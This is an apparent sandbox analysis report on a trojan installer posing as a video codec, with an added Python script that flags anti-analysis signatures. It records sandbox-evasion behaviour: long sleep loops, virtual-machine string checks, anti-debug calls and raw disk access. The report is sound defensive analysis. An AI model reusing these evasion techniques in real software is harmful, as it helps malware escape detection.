        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | File created: C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exe
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | File created: C:\Users\user\AppData\Local\Zexter Video Codec\libgmodule-2.0-0.dll (copy)

        Boot Survival

        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_00401A4F
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02BCF879
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe | Code function: 3_2_00402199 lstrcmpiW,StartServiceCtrlDispatcherA,lstrcmpiW,3_2_00402199
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C1C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004241EC IsIconic,SetActiveWindow,SetFocus,1_2_004241EC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004241A4 IsIconic,SetActiveWindow,1_2_004241A4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418394
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042286C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004833BC IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_004833BC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_004175A8 IsIconic,GetCapture,1_2_004175A8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00417CDE IsIconic,SetWindowPos,1_2_00417CDE
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CE0
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Code function: 1_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F128
        Source: C:\Users\user\Desktop\L9rm7AX4mp.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_02BCF97D
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Window / User API: threadDelayed 4765
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Window / User API: threadDelayed 5072
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Dropped PE files which have not been started (75 files):
  Inno Setup helper binaries under C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\: _RegDLL.tmp, _setup64.tmp, _iscrypt.dll, _isdecmp.dll, _shfoldr.dll
  Under C:\Users\user\AppData\Local\Zexter Video Codec\:
    Inno Setup temporary extraction names (is-XXXXX.tmp): is-4BT74.tmp, is-OCNI8.tmp, is-MJPNF.tmp, is-6S03E.tmp, is-G59D3.tmp, is-I8TQ0.tmp, is-6DO3I.tmp, is-FGQU3.tmp, is-4L8QF.tmp, is-65SGC.tmp, is-H2J0H.tmp, is-O9QDL.tmp, is-D169I.tmp, is-4GU98.tmp, is-QACPG.tmp, is-4SCDL.tmp, is-BA0AN.tmp, is-9G1LK.tmp, is-MOHPK.tmp, is-7G2MG.tmp, is-OMDJC.tmp, is-61SBR.tmp, is-FLD95.tmp, is-MVKEA.tmp, is-MMD8V.tmp, is-ILE5I.tmp, is-S5KF0.tmp, is-2TIQ1.tmp, is-4PKG7.tmp, is-MI7QU.tmp, is-2DT7G.tmp, is-JTN8Q.tmp, is-TNU6F.tmp, is-PM61J.tmp
    MinGW/GTK runtime DLLs, each reported as "(copy)": libpangomm-1.4-1.dll, liblcms2-2.dll, libpangoft2-1.0-0.dll, libjpeg-8.dll, libstdc++-6.dll, libgdk-win32-2.0-0.dll, libgobject-2.0-0.dll, libgcc_s_dw2-1.dll, liblzma-5.dll, libxml2-2.dll, libintl-8.dll, libfreetype-6.dll, libglibmm-2.4-1.dll, libsigc-2.0-0.dll, libtiff-5.dll, libharfbuzz-0.dll, libglib-2.0-0.dll, libiconv-2.dll, libgomp-1.dll, libgdk_pixbuf-2.0-0.dll, librsvg-2-2.dll, libwinpthread-1.dll, libgio-2.0-0.dll, libpng16-16.dll, libpangocairo-1.0-0.dll, libpango-1.0-0.dll, libgiomm-2.4-1.dll, zlib1.dll, libgraphite2.dll, libpixman-1-0.dll, libpcre-1.dll, libpangowin32-1.0-0.dll, libgdkmm-2.4-1.dll, libgmodule-2.0-0.dll
    Uninstaller: uninstall\unins000.exe (copy), uninstall\is-1611L.tmp
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5688
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-21689
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984 -- Thread sleep count: 4765 > 30
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984 -- Thread sleep time: -9530000s >= -30000s (= 4765 x 2000)
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 5036 -- Thread sleep count: 76 > 30
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 5036 -- Thread sleep time: -4560000s >= -30000s (= 76 x 60000)
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984 -- Thread sleep count: 5072 > 30
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984 -- Thread sleep time: -10144000s >= -30000s (= 5072 x 2000)
Each reported total is the sleep count multiplied by the per-call delay in milliseconds (2000 ms, and 60000 ms for the thread matching the "delay time: 60000" entry below); the two loops on TID 984 alone stall the process for about 5.5 hours of wall-clock time, which is why a sandbox without sleep skipping would never reach the C2 traffic.
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Thread delayed: delay time: 60000
Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW B
Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000008A6000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW0
Source: zextervideocodec32_64.exe, 00000003.00000002.3289222096.00000000034F3000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- API call chain: ExitProcess graph end node graph_0-6728
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- API call chain: ExitProcess graph end node graph_3-19441
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- API call chain: ExitProcess graph end node graph_3-21909
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Code function: 3_2_02BE019E RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02BE019E
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502AC
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Code function: 3_2_02BC648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,3_2_02BC648B
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Code function: 3_2_02BD9508 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02BD9508
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00478420
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042E0AC
Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe -- Code function: 3_2_02BCF831 cpuid 3_2_02BCF831
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- Code function: GetLocaleInfoA,0_2_004051FC
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- Code function: GetLocaleInfoA,0_2_00405248
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: GetLocaleInfoA,1_2_00408570
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: GetLocaleInfoA,1_2_004085BC
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_0045892C
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- Code function: 0_2_004026C4 GetSystemTime,0_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp -- Code function: 1_2_00455588 GetUserNameA,1_2_00455588
Source: C:\Users\user\Desktop\L9rm7AX4mp.exe -- Code function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4
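As an added example (not part of the Joe Sandbox report and not Joe's own detection logic), the Python below parses signature lines of the form used above and applies a small rule set to the anti-analysis behaviour they record: anti-debug API pairs, cpuid fingerprinting, dynamic import resolution, adapter enumeration, raw disk access, VM marker strings, and the sleep loops, whose totals it converts to a per-call delay and hours of wall-clock stalling. The sample lines are copied from this section (some API chains shortened); the rule names, the marker lists and the millisecond reading of the sleep totals are assumptions of the example.

```python
"""Triage rules over Joe Sandbox behaviour-signature lines (added example)."""
import re
from collections import defaultdict

# Constructed input: lines taken from the report's behaviour section.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BE019E RtlEncodePointer,LoadLibraryExW,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,3_2_02BE019E",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984Thread sleep count: 4765 > 30Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 984Thread sleep time: -9530000s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 5036Thread sleep count: 76 > 30Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe TID: 5036Thread sleep time: -4560000s >= -30000sJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeFile opened: PhysicalDrive0Jump to behavior",
    r"Source: zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: 3_2_02BCF831 cpuid 3_2_02BCF831",
    r"Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,3_2_00401B4B",
    r"Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,1_2_00418394",
]

# The report runs the source path and the signature text together, so we
# split on the signature prefixes themselves. Rule lists are this example's.
KINDS = ("Code function:", "Thread sleep count:", "Thread sleep time:",
         "File opened:", "Binary or memory string:")
FUNC_ID = re.compile(r"^\d+_\d+_[0-9A-Fa-f]{8}$")        # e.g. 3_2_02BE019E
TID_RE = re.compile(r"TID: (\d+)$")
RAW_DEVICE = re.compile(r"^(\\\\\.\\)?PhysicalDrive\d+$", re.IGNORECASE)
ANTI_DEBUG = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
              "OutputDebugStringA", "OutputDebugStringW"}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
VM_MARKERS = ("Hyper-V", "VMware", "VBox", "VirtualBox", "QEMU")


def parse_line(line):
    """Split one report line into process, thread id, signature kind, detail."""
    line = line.removeprefix("Source: ").removesuffix("Jump to behavior")
    for kind in KINDS:
        head, sep, detail = line.partition(kind)
        if sep:
            break
    else:
        return None
    head, tid = head.strip(), None
    m = TID_RE.search(head)
    if m:
        tid, head = int(m.group(1)), head[:m.start()].strip()
    # Memory-dump sources read "name, <dump id>"; file sources are full paths.
    process = head.split(",")[0].rsplit("\\", 1)[-1]
    return {"process": process, "tid": tid, "kind": kind.rstrip(":"),
            "detail": detail.strip()}


def api_chain(detail):
    """API names from a 'Code function' detail, minus Joe's function ids."""
    return [t for t in re.split(r"[ ,]+", detail) if t and not FUNC_ID.match(t)]


def evaluate(rec):
    """(tag, evidence) pairs for every anti-analysis rule the record trips."""
    hits, kind, detail = [], rec["kind"], rec["detail"]
    if kind == "Code function":
        apis = set(api_chain(detail))
        if apis & ANTI_DEBUG:
            hits.append(("anti-debug", sorted(apis & ANTI_DEBUG)))
        if "cpuid" in apis:
            hits.append(("cpu-fingerprint", ["cpuid"]))
        if apis & LOADERS and "GetProcAddress" in apis:
            hits.append(("dynamic-import", sorted(apis & LOADERS) + ["GetProcAddress"]))
        if "GetAdaptersInfo" in apis:
            hits.append(("adapter-enum", ["GetAdaptersInfo"]))
    elif kind == "File opened" and RAW_DEVICE.match(detail):
        hits.append(("raw-disk-access", [detail]))
    elif kind == "Binary or memory string" and any(v in detail for v in VM_MARKERS):
        hits.append(("vm-marker-string", [detail]))
    return hits


def sleep_budget(records):
    """Pair sleep-count and sleep-time lines per (process, tid).

    Joe prints the total with an 's' suffix, but in this report each total is
    count x 2000 or count x 60000, i.e. the Sleep() argument in milliseconds
    (assumption of this example, taken from that arithmetic)."""
    per = defaultdict(dict)
    for r in records:
        num = re.search(r"\d+", r["detail"])
        if r["kind"] == "Thread sleep count":
            per[(r["process"], r["tid"])]["count"] = int(num.group())
        elif r["kind"] == "Thread sleep time":
            per[(r["process"], r["tid"])]["total_ms"] = int(num.group())
    return {k: {**v, "per_call_ms": v["total_ms"] // v["count"],
                "hours": round(v["total_ms"] / 3_600_000, 2)}
            for k, v in per.items() if "count" in v and "total_ms" in v}


def analyze(lines):
    """Findings per process (only processes with hits) plus sleep budget per thread."""
    records = [r for r in map(parse_line, lines) if r]
    findings = defaultdict(list)
    for r in records:
        if hits := evaluate(r):
            findings[r["process"]].extend(hits)
    return dict(findings), sleep_budget(records)


if __name__ == "__main__":
    found, sleeps = analyze(SAMPLE_LINES)
    for proc, hits in found.items():
        print(proc, *[f"  {tag}: {', '.join(ev)}" for tag, ev in hits], sep="\n")
    for (proc, tid), s in sleeps.items():
        print(f"{proc} TID {tid}: {s['count']} x {s['per_call_ms']} ms = {s['hours']} h")
```

The installer process (L9rm7AX4mp.tmp) trips none of the rules: its IsIconic/GetWindowPlacement chains are ordinary window-management code, which is the point of keeping the rule set narrow. The dropped payload trips all six, and the sleep budget shows why an analysis run that honours the delays would end before the SOCKS5 traffic starts.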

Stealing of Sensitive Information

Source: Yara match -- File source: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: zextervideocodec32_64.exe PID: 1216, type: MEMORYSTR

Remote Access Functionality

Source: Yara match -- File source: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: zextervideocodec32_64.exe PID: 1216, type: MEMORYSTR
MITRE ATT&CK matrix

Tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact. Techniques with at least one matching signature are listed per tactic, with the number of mapped signatures in parentheses; the unmatched cells of the matrix template are omitted.

Execution: Native API (3), Service Execution (2)
Persistence: DLL Side-Loading (1), Windows Service (5), Bootkit (1)
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Access Token Manipulation (1), Windows Service (5), Process Injection (2)
Defense Evasion: Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (21), Timestomp (1), DLL Side-Loading (1), Masquerading (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Process Injection (2), Bootkit (1)
Discovery: System Time Discovery (1), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (35), Security Software Discovery (41), Process Discovery (1), Virtualization/Sandbox Evasion (21), Application Window Discovery (11), System Owner/User Discovery (3), Remote System Discovery (1), System Network Configuration Discovery (1)
Collection: Archive Collected Data (1)
Command and Control: Ingress Tool Transfer (2), Encrypted Channel (2), Non-Standard Port (1), Non-Application Layer Protocol (2), Application Layer Protocol (112)
Impact: System Shutdown/Reboot (1)
No matching signatures: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

Source | Detection | Scanner | Label
L9rm7AX4mp.exe | 24% | ReversingLabs | Win32.Trojan.Munp
Source | Detection | Scanner | Label
C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp | 4% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-2DT7G.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-2TIQ1.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-4BT74.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-4GU98.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-4L8QF.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-4PKG7.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-4SCDL.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-61SBR.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-65SGC.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-6DO3I.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-6S03E.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-7G2MG.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-9G1LK.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-BA0AN.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-D169I.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-FGQU3.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-FLD95.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-G59D3.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-H2J0H.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-I8TQ0.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-ILE5I.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-JTN8Q.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-MI7QU.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-MJPNF.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-MMD8V.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-MOHPK.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-MVKEA.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-O9QDL.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-OCNI8.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-OMDJC.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-PM61J.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-QACPG.tmp | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-S5KF0.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\is-TNU6F.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\libfreetype-6.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\libgcc_s_dw2-1.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\libgdk-win32-2.0-0.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\libgdk_pixbuf-2.0-0.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\libgdkmm-2.4-1.dll (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Zexter Video Codec\libgio-2.0-0.dll (copy) | 0% | ReversingLabs |
        C:\Users\user\AppData\Local\Zexter Video Codec\libgiomm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libglib-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libglibmm-2.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgmodule-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgobject-2.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgomp-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libgraphite2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libharfbuzz-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libiconv-2.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libintl-8.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libjpeg-8.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\liblcms2-2.dll (copy)2%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\liblzma-5.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpango-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangocairo-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangoft2-1.0-0.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangomm-1.4-1.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Zexter Video Codec\libpangowin32-1.0-0.dll (copy)0%ReversingLabs
